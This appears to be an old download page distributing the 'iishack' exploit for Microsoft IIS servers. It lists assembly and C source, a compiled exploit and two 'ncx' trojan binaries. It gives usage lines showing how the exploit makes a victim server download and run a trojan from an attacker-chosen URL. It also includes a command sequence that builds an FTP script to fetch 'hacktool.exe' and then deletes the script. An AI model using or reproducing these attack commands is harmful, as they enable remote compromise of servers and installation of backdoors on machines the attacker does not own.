| Here, you will find out why Windows may be the desktop of choice, but SHOULD NOT BE USED AS A SERVER. | 
| Win32 (assembly) Source code: | iishack.asm | 12,523 bytes | [674] | 
| Unix (c) Source code: | iishack.c | 9,935 bytes | [516] | 
| Exploit program: | iishack.exe | 3,526 bytes | [2151] | 
| Trojan (port 80): | ncx.exe | 31,744 bytes | [1593] | 
| Trojan (port 99): | ncx99.exe | 59,392 bytes | [1321] | 
iishack www.example.com 80 www.myhomepage.com/mydirectory/ncx.exeThis will connect to www.example.com at port 80, and send the attack. The victim server will then download http://www.myhomepage.com/mydirectory/ncx.exe and run it.
| (c) dark spyrit -- 
      [email protected]. http://www.eEye.com [usage: iishack <host> <port> <url>] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe do not include 'http://' before hosts!  | 
| C:\> echo anonymous > 
      myscript.txt C:\> echo [email protected] >> myscript.txt C:\> echo cd pub >> myscript.txt C:\> echo binary >> myscript.txt C:\> echo get hacktool.exe >> myscript.txt C:\> echo bye >> myscript.txt C:\> ftp -s:myscript.txt ftp.myserver.com C:\> del myscript.txt  |